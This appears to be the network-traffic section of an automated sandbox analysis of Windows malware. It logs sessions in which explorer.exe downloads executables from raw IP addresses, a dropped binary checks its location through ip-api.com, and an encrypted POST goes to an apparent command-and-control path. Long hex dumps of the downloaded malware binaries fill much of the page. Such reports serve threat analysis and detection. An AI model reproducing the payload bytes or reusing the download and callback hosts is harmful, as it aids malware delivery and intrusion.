72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:48.781712055 CET	31888	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uieodwfhihnk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 111 Host: 194.49.94.210
Nov 18, 2023 10:02:48.781760931 CET	31889	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a4 d5 f3 c9 38 df 28 fc 82 6e 9a 32 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(n24um\7$'(;Q*\|
Nov 18, 2023 10:02:49.095758915 CET	31919	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 43 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c5 12 e1 5c a9 f8 70 7d 8e d7 5e f3 d0 3c 96 b3 2c 57 fc 10 ed 03 30 c8 Data Ascii: H>99$JY\p}^<,W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	192.168.2.4	49757	185.196.9.161	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:44.970756054 CET	30673	OUT	GET /Chjirossjr.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 185.196.9.161
Nov 18, 2023 10:02:45.279573917 CET	30674	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:45 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 Last-Modified: Fri, 17 Nov 2023 15:59:44 GMT ETag: "102200-60a5b39950d4e" Accept-Ranges: bytes Content-Length: 1057280 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 e2 8d 57 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 1a 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 10 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 18 10 00 00 20 00 00 00 1a 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 40 10 00 00 06 00 00 00 1c 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 2d 0f 00 b0 0a 01 00 01 00 00 00 0c 00 00 06 d8 f4 00 00 d8 38 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 00 00 06 00 00 00 00 00 00 00 28 74 03 00 06 2a 06 2a 13 30 02 00 2f 00 00 00 01 00 00 11 12 00 28 01 00 00 0a 7d 02 00 00 04 12 00 15 7d 01 00 00 04 12 00 7c 02 00 00 04 12 00 28 01 00 00 2b 12 00 7c 02 00 00 04 28 03 00 00 0a 2a 00 13 30 02 00 37 00 00 00 02 00 00 11 12 00 28 01 00 00 0a 7d 06 00 00 04 12 00 02 7d 07 00 00 04 12 00 15 7d 05 00 00 04 12 00 7c 06 00 00 04 12 00 28 02 00 00 2b 12 00 7c 06 00 00 04 28 03 00 00 0a 2a 00 1b 30 03 00 58 01 00 00 03 00 00 11 02 7b 01 00 00 04 0a 06 2c 3e 06 17 3b f4 00 00 00 28 0b 00 00 06 6f 05 00 00 0a 0b 12 01 28 06 00 00 0a 2d 3f 02 16 25 0a 7d 01 00 00 04 02 07 7d 03 00 00 04 02 7c 02 00 00 04 12 01 02 28 03 00 00 2b dd 0f 01 00 00 02 7b 03 00 00 04 0b 02 7c 03 00 00 04 fe 15 02 00 00 1b 02 15 25 0a 7d 01 00 00 04 12 01 28 08 00 00 0a 28 09 00 00 0a 28 0a 00 00 0a 0c 12 02 28 0b 00 00 0a 75 0e 00 00 01 20 a1 7c 00 00 28 68 03 00 06 6f 0c 00 00 0a 28 0a 00 00 0a 0d d0 0f 00 00 01 28 0d 00 00 0a 12 03 28 0b 00 00 0a 75 05 00 00 01 20 30 7a 00 00 28 68 03 00 06 28 0e 00 00 0a 12 02 28 0f 00 00 0a 12 03 28 0f 00 00 0a 28 10 00 00 0a 28 04 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdWe" @ ``@ H.text` `.rsrc@@@H-80(t*0/(}}\|(+\|(07(}}}\|(+\|(*0X{,>;(o(-?%}}\|(+{\|%}((((u \|(ho(((u 0z(h(((((
Nov 18, 2023 10:02:45.279589891 CET	30676	IN	Data Raw: 06 6f 11 00 00 0a 13 04 12 04 28 12 00 00 0a 2d 3e 02 17 25 0a 7d 01 00 00 04 02 11 04 7d 04 00 00 04 02 7c 02 00 00 04 12 04 02 28 04 00 00 2b de 52 02 7b 04 00 00 04 13 04 02 7c 04 00 00 04 fe 15 0a 00 00 01 02 15 25 0a 7d 01 00 00 04 12 04 28 Data Ascii: o(->%}}\|(+R{\|%}(}\|(}\|(A$+6\|(0A{o&}\|(}
Nov 18, 2023 10:02:45.279618979 CET	30677	IN	Data Raw: 28 37 00 00 0a 02 7b 35 00 00 0a 06 7b 35 00 00 0a 6f 38 00 00 0a 39 17 00 00 00 28 39 00 00 0a 02 7b 36 00 00 0a 06 7b 36 00 00 0a 6f 3a 00 00 0a 2a 16 2a d2 20 69 8d a3 a9 20 29 55 55 a5 5a 28 37 00 00 0a 02 7b 35 00 00 0a 6f 3b 00 00 0a 58 20 Data Ascii: (7{5{5o89(9{6{6o:** i )UUZ(7{5o;X )UUZ(9{6o<X*0 2\|(h%{5-q-&+o=%{6-q-&+
Nov 18, 2023 10:02:45.279633999 CET	30678	IN	Data Raw: 01 25 3a 02 00 00 00 26 2a 6f 2b 00 00 0a 2a 32 28 7f 00 00 06 02 6f 30 00 00 06 2a 32 28 7f 00 00 06 02 6f 31 00 00 06 2a 3a 28 7f 00 00 06 02 03 04 6f 32 00 00 06 2a 2e 28 7f 00 00 06 6f 0a 00 00 2b 2a 32 28 7f 00 00 06 02 6f 34 00 00 06 2a 32 Data Ascii: %:&o+2(o02(o1:(o2.(o+2(o42(o56(o6:(o+>(o+F(o+:(o::(o;>(o+F(o+N(o+*>(
Nov 18, 2023 10:02:45.279647112 CET	30680	IN	Data Raw: 04 2c 10 20 63 7c 00 00 28 68 03 00 06 73 55 00 00 0a 7a 02 17 7d 25 00 00 04 02 fe 06 e3 00 00 06 73 56 00 00 0a 0a 02 7b 1b 00 00 04 73 b5 02 00 06 0b 02 7b 1c 00 00 04 28 17 00 00 2b 0c 08 2c 1b 17 8d 61 00 00 02 25 16 07 a2 02 7b 1c 00 00 04 Data Ascii: , c\|(hsUz}%sV{s{(+,a%{(+s{(+,{s{${{ shs{oY,.+s+{oZ+{s{!o[,{!{"{#
Nov 18, 2023 10:02:45.279659033 CET	30681	IN	Data Raw: 00 00 04 25 2d 17 26 7e 36 00 00 04 fe 06 02 01 00 06 73 81 00 00 0a 25 80 3f 00 00 04 28 24 00 00 2b 7e 40 00 00 04 25 2d 17 26 7e 36 00 00 04 fe 06 03 01 00 06 73 82 00 00 0a 25 80 40 00 00 04 28 25 00 00 2b 7e 41 00 00 04 25 2d 17 26 7e 36 00 Data Ascii: %-&~6s%?($+~@%-&~6s%@(%+~A%-&~6s%A~B%-&~6s%B(&+(#+('+-('+,B(('+,(o(('+,(o(*I
Nov 18, 2023 10:02:45.279670954 CET	30682	IN	Data Raw: 0c 01 00 06 73 b5 00 00 0a 25 80 4b 00 00 04 28 37 00 00 2b 7e 4c 00 00 04 25 3a 17 00 00 00 26 7e 36 00 00 04 fe 06 0f 01 00 06 73 b7 00 00 0a 25 80 4c 00 00 04 28 38 00 00 2b 7e 4d 00 00 04 25 3a 17 00 00 00 26 7e 36 00 00 04 fe 06 10 01 00 06 Data Ascii: s%K(7+~L%:&~6s%L(8+~M%:&~6s%M(,+'s(,+(9+*0ys%J(~6so%K(~6so1((o~6s
Nov 18, 2023 10:02:45.279684067 CET	30684	IN	Data Raw: 50 00 00 04 02 7b 4f 00 00 04 06 fe 06 1a 01 00 06 73 e4 00 00 0a 28 3f 00 00 2b 73 e5 00 00 0a 2a 5e 03 6f f3 00 00 06 02 7b 50 00 00 04 6f e6 00 00 0a 28 e0 00 00 0a 2a 13 30 04 00 4c 00 00 00 1c 00 00 11 03 6f df 00 00 0a 02 7b 51 00 00 04 28 Data Ascii: P{Os(?+s^o{Po(0Lo{Q(94o((+{S%:&s%}S(<+07s }U{Uo:{R!s(@+0.o{T%:
Nov 18, 2023 10:02:45.279721022 CET	30685	IN	Data Raw: 12 05 28 3f 01 00 06 3a 08 00 00 00 07 06 73 61 01 00 06 2a 09 13 06 11 06 16 6f f6 00 00 0a 12 07 28 42 01 00 06 39 0a 00 00 00 11 06 17 6f 77 00 00 0a 13 06 11 06 6f 76 00 00 0a 3a 08 00 00 00 07 06 73 61 01 00 06 2a 16 13 08 38 21 00 00 00 11 Data Ascii: (?:sao(B9owov:sa8!o(A:saXov2948!o(E:saXov2O98!o(D:sa*X
Nov 18, 2023 10:02:45.279733896 CET	30686	IN	Data Raw: ff 16 2a 1e 02 7b 69 00 00 04 2a 1a 73 03 01 00 0a 7a 1e 02 7b 13 30 02 00 40 00 00 00 27 00 00 11 02 7b 68 00 00 04 1f fe 40 1e 00 00 00 02 7b 6a 00 00 04 28 01 01 00 0a 40 0e 00 00 00 02 16 7d 68 00 00 04 02 0a 38 07 00 00 00 16 73 48 01 00 06 Data Ascii: {isz{0@'{h@{j(@}h8sH{l}k(N:(-}n{n0(O(U*0y)(P- \|(hsGz- )z(hsGz}q}s}r
Nov 18, 2023 10:02:45.584753036 CET	30691	IN	Data Raw: 85 00 00 04 03 3a 07 00 00 00 14 73 1d 02 00 06 2a 06 7b 85 00 00 04 17 40 0c 00 00 00 03 6f 3d 00 00 0a 73 1d 02 00 06 2a 03 6f ef 00 00 0a 0b 06 05 02 7b 79 00 00 04 02 73 73 01 00 06 7d 84 00 00 04 02 7b 78 00 00 04 0c 16 0d 38 21 00 00 00 08 Data Ascii: :s{@o=so{yss}{x8!c{oH9Xi2{@8{w8"\{oA9Xi2u79o(n9E(H+xs(I+~

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	185.196.9.161	80	192.168.2.4	49757	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:44.970756054 CET	30673	OUT	GET /Chjirossjr.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 185.196.9.161
Nov 18, 2023 10:02:45.279573917 CET	30674	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:45 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 Last-Modified: Fri, 17 Nov 2023 15:59:44 GMT ETag: "102200-60a5b39950d4e" Accept-Ranges: bytes Content-Length: 1057280 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 e2 8d 57 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 1a 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 10 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 18 10 00 00 20 00 00 00 1a 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 40 10 00 00 06 00 00 00 1c 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 2d 0f 00 b0 0a 01 00 01 00 00 00 0c 00 00 06 d8 f4 00 00 d8 38 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 00 00 06 00 00 00 00 00 00 00 28 74 03 00 06 2a 06 2a 13 30 02 00 2f 00 00 00 01 00 00 11 12 00 28 01 00 00 0a 7d 02 00 00 04 12 00 15 7d 01 00 00 04 12 00 7c 02 00 00 04 12 00 28 01 00 00 2b 12 00 7c 02 00 00 04 28 03 00 00 0a 2a 00 13 30 02 00 37 00 00 00 02 00 00 11 12 00 28 01 00 00 0a 7d 06 00 00 04 12 00 02 7d 07 00 00 04 12 00 15 7d 05 00 00 04 12 00 7c 06 00 00 04 12 00 28 02 00 00 2b 12 00 7c 06 00 00 04 28 03 00 00 0a 2a 00 1b 30 03 00 58 01 00 00 03 00 00 11 02 7b 01 00 00 04 0a 06 2c 3e 06 17 3b f4 00 00 00 28 0b 00 00 06 6f 05 00 00 0a 0b 12 01 28 06 00 00 0a 2d 3f 02 16 25 0a 7d 01 00 00 04 02 07 7d 03 00 00 04 02 7c 02 00 00 04 12 01 02 28 03 00 00 2b dd 0f 01 00 00 02 7b 03 00 00 04 0b 02 7c 03 00 00 04 fe 15 02 00 00 1b 02 15 25 0a 7d 01 00 00 04 12 01 28 08 00 00 0a 28 09 00 00 0a 28 0a 00 00 0a 0c 12 02 28 0b 00 00 0a 75 0e 00 00 01 20 a1 7c 00 00 28 68 03 00 06 6f 0c 00 00 0a 28 0a 00 00 0a 0d d0 0f 00 00 01 28 0d 00 00 0a 12 03 28 0b 00 00 0a 75 05 00 00 01 20 30 7a 00 00 28 68 03 00 06 28 0e 00 00 0a 12 02 28 0f 00 00 0a 12 03 28 0f 00 00 0a 28 10 00 00 0a 28 04 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdWe" @ ``@ H.text` `.rsrc@@@H-80(t*0/(}}\|(+\|(07(}}}\|(+\|(*0X{,>;(o(-?%}}\|(+{\|%}((((u \|(ho(((u 0z(h(((((
Nov 18, 2023 10:02:45.279589891 CET	30676	IN	Data Raw: 06 6f 11 00 00 0a 13 04 12 04 28 12 00 00 0a 2d 3e 02 17 25 0a 7d 01 00 00 04 02 11 04 7d 04 00 00 04 02 7c 02 00 00 04 12 04 02 28 04 00 00 2b de 52 02 7b 04 00 00 04 13 04 02 7c 04 00 00 04 fe 15 0a 00 00 01 02 15 25 0a 7d 01 00 00 04 12 04 28 Data Ascii: o(->%}}\|(+R{\|%}(}\|(}\|(A$+6\|(0A{o&}\|(}
Nov 18, 2023 10:02:45.279618979 CET	30677	IN	Data Raw: 28 37 00 00 0a 02 7b 35 00 00 0a 06 7b 35 00 00 0a 6f 38 00 00 0a 39 17 00 00 00 28 39 00 00 0a 02 7b 36 00 00 0a 06 7b 36 00 00 0a 6f 3a 00 00 0a 2a 16 2a d2 20 69 8d a3 a9 20 29 55 55 a5 5a 28 37 00 00 0a 02 7b 35 00 00 0a 6f 3b 00 00 0a 58 20 Data Ascii: (7{5{5o89(9{6{6o:** i )UUZ(7{5o;X )UUZ(9{6o<X*0 2\|(h%{5-q-&+o=%{6-q-&+
Nov 18, 2023 10:02:45.279633999 CET	30678	IN	Data Raw: 01 25 3a 02 00 00 00 26 2a 6f 2b 00 00 0a 2a 32 28 7f 00 00 06 02 6f 30 00 00 06 2a 32 28 7f 00 00 06 02 6f 31 00 00 06 2a 3a 28 7f 00 00 06 02 03 04 6f 32 00 00 06 2a 2e 28 7f 00 00 06 6f 0a 00 00 2b 2a 32 28 7f 00 00 06 02 6f 34 00 00 06 2a 32 Data Ascii: %:&o+2(o02(o1:(o2.(o+2(o42(o56(o6:(o+>(o+F(o+:(o::(o;>(o+F(o+N(o+*>(
Nov 18, 2023 10:02:45.279647112 CET	30680	IN	Data Raw: 04 2c 10 20 63 7c 00 00 28 68 03 00 06 73 55 00 00 0a 7a 02 17 7d 25 00 00 04 02 fe 06 e3 00 00 06 73 56 00 00 0a 0a 02 7b 1b 00 00 04 73 b5 02 00 06 0b 02 7b 1c 00 00 04 28 17 00 00 2b 0c 08 2c 1b 17 8d 61 00 00 02 25 16 07 a2 02 7b 1c 00 00 04 Data Ascii: , c\|(hsUz}%sV{s{(+,a%{(+s{(+,{s{${{ shs{oY,.+s+{oZ+{s{!o[,{!{"{#
Nov 18, 2023 10:02:45.279659033 CET	30681	IN	Data Raw: 00 00 04 25 2d 17 26 7e 36 00 00 04 fe 06 02 01 00 06 73 81 00 00 0a 25 80 3f 00 00 04 28 24 00 00 2b 7e 40 00 00 04 25 2d 17 26 7e 36 00 00 04 fe 06 03 01 00 06 73 82 00 00 0a 25 80 40 00 00 04 28 25 00 00 2b 7e 41 00 00 04 25 2d 17 26 7e 36 00 Data Ascii: %-&~6s%?($+~@%-&~6s%@(%+~A%-&~6s%A~B%-&~6s%B(&+(#+('+-('+,B(('+,(o(('+,(o(*I
Nov 18, 2023 10:02:45.279670954 CET	30682	IN	Data Raw: 0c 01 00 06 73 b5 00 00 0a 25 80 4b 00 00 04 28 37 00 00 2b 7e 4c 00 00 04 25 3a 17 00 00 00 26 7e 36 00 00 04 fe 06 0f 01 00 06 73 b7 00 00 0a 25 80 4c 00 00 04 28 38 00 00 2b 7e 4d 00 00 04 25 3a 17 00 00 00 26 7e 36 00 00 04 fe 06 10 01 00 06 Data Ascii: s%K(7+~L%:&~6s%L(8+~M%:&~6s%M(,+'s(,+(9+*0ys%J(~6so%K(~6so1((o~6s
Nov 18, 2023 10:02:45.279684067 CET	30684	IN	Data Raw: 50 00 00 04 02 7b 4f 00 00 04 06 fe 06 1a 01 00 06 73 e4 00 00 0a 28 3f 00 00 2b 73 e5 00 00 0a 2a 5e 03 6f f3 00 00 06 02 7b 50 00 00 04 6f e6 00 00 0a 28 e0 00 00 0a 2a 13 30 04 00 4c 00 00 00 1c 00 00 11 03 6f df 00 00 0a 02 7b 51 00 00 04 28 Data Ascii: P{Os(?+s^o{Po(0Lo{Q(94o((+{S%:&s%}S(<+07s }U{Uo:{R!s(@+0.o{T%:
Nov 18, 2023 10:02:45.279721022 CET	30685	IN	Data Raw: 12 05 28 3f 01 00 06 3a 08 00 00 00 07 06 73 61 01 00 06 2a 09 13 06 11 06 16 6f f6 00 00 0a 12 07 28 42 01 00 06 39 0a 00 00 00 11 06 17 6f 77 00 00 0a 13 06 11 06 6f 76 00 00 0a 3a 08 00 00 00 07 06 73 61 01 00 06 2a 16 13 08 38 21 00 00 00 11 Data Ascii: (?:sao(B9owov:sa8!o(A:saXov2948!o(E:saXov2O98!o(D:sa*X
Nov 18, 2023 10:02:45.279733896 CET	30686	IN	Data Raw: ff 16 2a 1e 02 7b 69 00 00 04 2a 1a 73 03 01 00 0a 7a 1e 02 7b 13 30 02 00 40 00 00 00 27 00 00 11 02 7b 68 00 00 04 1f fe 40 1e 00 00 00 02 7b 6a 00 00 04 28 01 01 00 0a 40 0e 00 00 00 02 16 7d 68 00 00 04 02 0a 38 07 00 00 00 16 73 48 01 00 06 Data Ascii: {isz{0@'{h@{j(@}h8sH{l}k(N:(-}n{n0(O(U*0y)(P- \|(hsGz- )z(hsGz}q}s}r
Nov 18, 2023 10:02:45.584753036 CET	30691	IN	Data Raw: 85 00 00 04 03 3a 07 00 00 00 14 73 1d 02 00 06 2a 06 7b 85 00 00 04 17 40 0c 00 00 00 03 6f 3d 00 00 0a 73 1d 02 00 06 2a 03 6f ef 00 00 0a 0b 06 05 02 7b 79 00 00 04 02 73 73 01 00 06 7d 84 00 00 04 02 7b 78 00 00 04 0c 16 0d 38 21 00 00 00 08 Data Ascii: :s{@o=so{yss}{x8!c{oH9Xi2{@8{w8"\{oA9Xi2u79o(n9E(H+xs(I+~

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	192.168.2.4	49763	208.95.112.1	80	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:48.604273081 CET	31887	OUT	GET /line?fields=query,country HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 18, 2023 10:02:48.757865906 CET	31887	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:47 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 29 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 0a Data Ascii: United States156.146.49.168

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	208.95.112.1	80	192.168.2.4	49763	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:48.604273081 CET	31887	OUT	GET /line?fields=query,country HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 18, 2023 10:02:48.757865906 CET	31887	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:47 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 29 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 0a Data Ascii: United States156.146.49.168

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	192.168.2.4	49764	5.42.65.80	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:49.438163042 CET	31980	OUT	GET /brandrock.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 5.42.65.80
Nov 18, 2023 10:02:49.762403011 CET	32208	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 18 Nov 2023 09:02:49 GMT Content-Type: application/octet-stream Content-Length: 12832256 Last-Modified: Fri, 17 Nov 2023 15:57:58 GMT Connection: keep-alive ETag: "65578d86-c3ce00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 86 8d 57 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 c4 c3 00 00 08 00 00 00 00 00 00 4e e3 c3 00 00 20 00 00 00 00 c4 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 c4 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e3 c3 00 4b 00 00 00 00 00 c4 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c4 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 c3 c3 00 00 20 00 00 00 c4 c3 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 04 00 00 00 00 c4 00 00 06 00 00 00 c6 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 c4 00 00 02 00 00 00 cc c3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 e3 c3 00 00 00 00 00 48 00 00 00 02 00 05 00 4c cd c3 00 b4 15 00 00 03 00 00 00 01 00 00 06 00 28 00 00 49 a5 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 